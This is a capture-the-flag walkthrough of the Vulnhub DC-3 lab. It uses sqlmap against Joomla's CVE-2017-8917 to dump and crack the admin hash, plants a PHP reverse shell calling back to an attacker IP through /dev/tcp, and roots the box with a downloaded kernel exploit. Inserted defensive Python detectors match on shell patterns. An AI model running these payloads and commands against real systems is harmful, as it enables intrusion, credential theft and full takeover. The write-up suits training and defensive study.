
【Vulnhub】— DC-3


Host discovery

While setting up the DC-3 VM there was a small problem: the VM could not obtain an IP address. According to explanations from experienced people online, this is caused by a mismatched network interface, so I used the Linux rescue mode to edit the NIC configuration, restarted the network interface and then the machine, and the VM got its IP address. Once I finish this box I will add a tutorial for that.

Using the netdiscover command, the target machine was found at 192.168.234.178.

Port scanning

Using Nmap:

root@kali:~/桌面# nmap -sS -A -p 1-65535 192.168.234.178 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-08 15:02 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.178
Host is up (0.00055s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.178
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.178:80/
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/2-uncategorised/1-welcome
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=reset.request&Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/2-uncategorised
|     Form id: login-form
|_    Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
|   /language/en-GB/en-GB.xml: Joomla version 3.7.0
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917: 
|   VULNERABLE:
|   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-8917
|     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
|       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
|       to execute aribitrary SQL commands via unspecified vectors.
|       
|     Disclosure date: 2017-05-17
|     Extra information:
|       User: root@localhost
|     References:
|       https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
| vulners: 
|   Apache httpd 2.4.18: 
|     	HTTPD:F564BBA32AA088833DA032B7EB77CA29	7.5	https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
MAC Address: 00:0C:29:15:DC:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.234.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 365.77 seconds

From the scan results, the target has only port 80 open. The CMS is Joomla, and it has a SQL injection vulnerability, CVE-2017-8917.

CVE-2017-8917

This vulnerability affects every site running the Joomla CMS at version 3.7 or below. An attacker can exploit it to retrieve the contents of the database, including user data and session data. With that data the attacker can use a session to log in to the site's backend, view sensitive information, and also change the original password.

Running `searchsploit joomla` in Kali to look for a usable exploit turns up so many Joomla vulnerabilities that it is dizzying to read through.

Better to search on GitHub instead; the searchsploit results do not show the CVE number, which is not very direct.

Fortunately, there we saw the exploit-db ID for CVE-2017-8917, so we can narrow the search with the command:

searchsploit joomla | grep 42033

Then save the exploit locally with the following command:

searchsploit joomla -m exploits/php/webapps/42033.txt

Check how it is used:

root@kali:~/桌面# cat 42033.txt 
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
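From the defender's side, the description of CVE-2017-8917 above and the exploit text's probe (`list[fullordering]=updatexml%27`) and sqlmap payloads suggest a simple detection: Joomla only ever sends `list[fullordering]` as `<column> ASC|DESC`, so anything else in that parameter is worth an alert. The following is an added example (not code from the write-up or from Joomla) that runs that check over constructed Apache access-log lines; the IP addresses, timestamps and user agents are made up, and the payloads are the ones printed in the exploit text above.

```python
"""Added example (not part of the original write-up): flag requests whose
Joomla 'list[fullordering]' parameter is not a plain sort expression.
The log lines below are constructed to resemble Apache combined format."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines: a legitimate admin sort, the probe from the exploit
# text, a sqlmap error-based payload, and an unrelated page view.
SAMPLE_LOG = r"""
10.0.0.5 - - [08/Feb/2020:16:10:01 +0800] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Feb/2020:16:15:42 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Feb/2020:16:16:18 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT%206600%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171767071%2C%28SELECT%20%28ELT%286600%3D6600%2C1%29%29%29%2C0x716a707671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 812 "-" "sqlmap/1.4"
10.0.0.7 - - [08/Feb/2020:16:20:00 +0800] "GET /index.php/2-uncategorised/1-welcome HTTP/1.1" 200 9981 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Joomla fills list[fullordering] with "<column> <ASC|DESC>"; the UI never
# sends anything else, so this allowlist is the whole policy.
SAFE_ORDERING = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$", re.IGNORECASE)

# Only used to label a hit more precisely; the allowlist above already decided.
SQL_HINT = re.compile(
    r"\b(select|union|updatexml|extractvalue|case\s+when|sleep|benchmark|floor\(rand)\b|['()]",
    re.IGNORECASE,
)


def suspicious_fullordering(line):
    """Return (client_ip, component, value, reason) when the request carries a
    list[fullordering] value outside the allowlist, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    values = params.get("list[fullordering]")   # parse_qs decodes %5B/%5D in keys
    if not values:
        return None
    value = values[0]
    if SAFE_ORDERING.match(value):
        return None
    reason = "sql-syntax" if SQL_HINT.search(value) else "malformed-ordering"
    client_ip = line.split(" ", 1)[0]
    component = params.get("option", ["?"])[0]
    return (client_ip, component, value, reason)


def scan_log(text):
    """Run the check over every line of an access log and collect the hits."""
    hits = (suspicious_fullordering(line) for line in text.strip().splitlines())
    return [hit for hit in hits if hit]


if __name__ == "__main__":
    for ip, component, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {component} {reason}: {value[:60]}")
```

The allowlist does the work here, not the keyword list: a blocklist of SQL words is easy to evade, whereas a sort expression that is not `column [ASC|DESC]` is never something the application itself produced, regardless of how the payload is encoded. Patching to 3.7.1 or later is still the actual fix; this only tells you whether someone tried.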

It looks like sqlmap is the tool to use.

The command used:

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

This yields the following databases:

[16:16:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[16:16:18] [INFO] fetching database names
[16:16:18] [INFO] used SQL query returns 5 entries
[16:16:18] [INFO] retrieved: 'information_schema'
[16:16:18] [INFO] retrieved: 'joomladb'
[16:16:18] [INFO] retrieved: 'mysql'
[16:16:18] [INFO] retrieved: 'performance_schema'
[16:16:18] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

Next, focus on the joomladb database:

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

We see #__users. For a table name containing special characters like this one, the name has to be wrapped in single quotes when querying its columns.

Query the table's columns:

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

With username and password available, the rest is easy: dump them directly.

Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+


From the output above, we crack the hash with john and finally get the password: snoopy.

Logging in to the site

The site's home page tells us that this box has only one flag, and that we must get root to obtain it. Never mind, let's get going!

Getting the flag

We log in to the site with the account and password.

After going through the whole site without finding anything exploitable, let's look for the admin backend instead, using dirb, which ships with Kali:

root@kali:~/桌面# dirb http://192.168.234.178/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb  8 20:27:29 2020
URL_BASE: http://192.168.234.178/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.234.178/ ----
==> DIRECTORY: http://192.168.234.178/administrator/                           
==> DIRECTORY: http://192.168.234.178/bin/                                     
==> DIRECTORY: http://192.168.234.178/cache/                                   
==> DIRECTORY: http://192.168.234.178/components/                              
==> DIRECTORY: http://192.168.234.178/images/                                  
==> DIRECTORY: http://192.168.234.178/includes/             

The backend was found at http://192.168.234.178/administrator/

Log in to the backend.

This CMS is very much like WordPress: find where templates are edited, and modifying a template file is enough to exploit it.

Here, the idea is to write a reverse shell in PHP.

First find where templates are edited, as follows:

Reverse shell

Edit the file index.php:

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.234.151/7777 0>&1' ");
?> 

After saving, start a listener in Kali.

Use the command nc -lvp 7777

Once the listener is up, visit index.php.

Now we have a shell.
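The step just described, an administrator account editing a template's index.php, is invisible to network scanners but easy to catch on the host: template files are presentation code that should never spawn processes, and they change only during deployments. The following added example (not code from the write-up or from Joomla) builds a constructed template tree in a temporary directory, records a SHA-256 baseline, plants the same kind of payload, and reports it through both a hash diff and a content scan. The template name `protostar`, the paths and the 192.0.2.10 address are assumptions for the demo.

```python
"""Added example (not the write-up's own code): detect tampered Joomla template
files. Two independent checks: a SHA-256 baseline comparison and a scan for
PHP constructs that spawn processes or open raw sockets.
The template tree is constructed in a temporary directory."""
import hashlib
import os
import re
import tempfile

# Constructs a presentation-only template file has no business containing
# (assumption: templates on this site carry no custom server-side logic).
DANGEROUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(|/dev/tcp/|base64_decode\s*\(",
    re.IGNORECASE,
)

# Constructed content: a minimal clean template, and the same file with the
# kind of payload shown in the write-up appended (address is a documentation IP).
CLEAN_INDEX = (
    "<?php\ndefined('_JEXEC') or die;\n?>\n"
    "<html><body><jdoc:include type=\"component\" /></body></html>\n"
)
SHELL_INDEX = CLEAN_INDEX + "<?php\nsystem(\"bash -c 'bash -i >& /dev/tcp/192.0.2.10/7777 0>&1'\");\n?>\n"


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline(template_dir):
    """Map relative path -> SHA-256 for every .php file under template_dir."""
    digests = {}
    for root, _dirs, files in os.walk(template_dir):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(root, name)
                digests[os.path.relpath(full, template_dir)] = sha256_file(full)
    return digests


def audit(template_dir, known_good):
    """Return {relative path: [reasons]} for files that differ from the baseline
    or that contain process-spawning constructs. Clean, unchanged files are absent."""
    findings = {}
    current = baseline(template_dir)
    for rel, digest in current.items():
        reasons = []
        if rel not in known_good:
            reasons.append("new file")
        elif known_good[rel] != digest:
            reasons.append("hash changed")
        with open(os.path.join(template_dir, rel), encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if DANGEROUS.search(line):
                    reasons.append(f"line {lineno}: {line.strip()[:60]}")
        if reasons:
            findings[rel] = reasons
    for rel in known_good:
        if rel not in current:
            findings[rel] = ["missing"]
    return findings


def demo():
    """Baseline a constructed template tree, tamper with index.php, and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = os.path.join(tmp, "templates", "protostar")   # assumed template name
        os.makedirs(tpl)
        for name in ("index.php", "error.php"):
            with open(os.path.join(tpl, name), "w") as fh:
                fh.write(CLEAN_INDEX)
        known_good = baseline(tpl)            # recorded while the site is trusted
        with open(os.path.join(tpl, "index.php"), "w") as fh:
            fh.write(SHELL_INDEX)             # the tampering
        return audit(tpl, known_good)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, reasons)
```

Run the baseline right after a deployment and store it off the web server (an attacker with admin access to the CMS can write to the template directory, so a manifest kept beside the templates can be rewritten too). The content scan is the fallback for files that were never baselined; it catches the write-up's payload by both the `system(` call and the `/dev/tcp/` pseudo-path.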

Getting an interactive shell

Use the command python -c 'import pty;pty.spawn("/bin/bash")'

Getting root

Look for files with the SUID bit set: find / -user root -perm -4000 -print 2>/dev/null

But none of them turned out to be exploitable. This box is probably testing kernel privilege escalation, so use the command uname -a to check the Linux kernel version.

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Then use searchsploit to look for an exploit.

root@kali:~# searchsploit linux 4.4.0-21
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubun | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04  | exploits/linux/local/44300.c
--------------------------------------- ----------------------------------------
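The searchsploit listing above is keyed on Ubuntu kernel ABI numbers such as `4.4.0-21 < 4.4.0-51`, and the target's `uname -a` line carries exactly that form (`4.4.0-21-generic`). A patch-level check has to compare these numerically, not as strings. The following added example (not code from the write-up) parses the release string out of the uname line printed on the target and tests it against a range; the only range it ships with is the one the 47170.c entry prints, and treating that as "first affected, first fixed" is an assumption for the demo.

```python
"""Added example (not from the write-up): parse the kernel release from a
`uname -a` line and compare Ubuntu kernel ABI versions numerically."""
import re

# The line printed on the target in the write-up.
UNAME_LINE = ("Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 "
              "UTC 2016 i686 i686 i686 GNU/Linux")

# Ranges in the form (label, first affected, first fixed). The single entry is
# read off the searchsploit output above; the interpretation is an assumption.
RANGES = [("47170.c", "4.4.0-21", "4.4.0-51")]

RELEASE_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)-(\d+)(?:-[a-z0-9-]+)?\b")


def parse_release(text):
    """Return (major, minor, patch, abi) for the first Ubuntu-style kernel
    release in text, e.g. '4.4.0-21-generic' -> (4, 4, 0, 21)."""
    m = RELEASE_RE.search(text)
    if not m:
        raise ValueError("no kernel release found in: " + text)
    return tuple(int(g) for g in m.groups())


def affected(uname_line, first_affected, first_fixed):
    """True when the running kernel is >= first_affected and < first_fixed."""
    running = parse_release(uname_line)
    return parse_release(first_affected) <= running < parse_release(first_fixed)


def matching_ranges(uname_line, ranges=RANGES):
    """Labels of every range the running kernel falls into."""
    return [label for label, low, high in ranges if affected(uname_line, low, high)]


if __name__ == "__main__":
    print(parse_release(UNAME_LINE), matching_ranges(UNAME_LINE))
```

The numeric comparison matters because a string comparison puts `4.4.0-112` before `4.4.0-51`, which would mark a much newer kernel as vulnerable. The upstream version alone (`4.4.0`) is not enough either: Ubuntu backports fixes into the same upstream base and bumps only the ABI number, so the ABI (or the kernel package version from `dpkg -l`) is the value to compare against the fix.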

...... After trying for a long time, none of them worked.

Then I also tried CVE-2017-16995, which did not succeed either.

After reading an expert's article, I learned that the privilege escalation uses a Linux denial-of-service vulnerability.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.


Download it directly onto the target with wget: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip 
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  

----------------------------------------------------------------
tar -zxvf exploit.tar

gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
www-data@DC-3:/var/www/html/39772$ tar -xvf exp	
tar -xvf exploit.tar 
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

-----------------------------------------------------------------
cd ebpf_mapfd_doubleput_exploit/
./compile.sh             // compile with the bundled shell script; it prints the warnings below, but they do not matter.
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
------------------------------------------------------------------
Next comes the privilege escalation.
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
id
id
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Completing this box was fairly difficult; it was the first time I had seen this kind of kernel privilege escalation, and I still need to gain more experience.
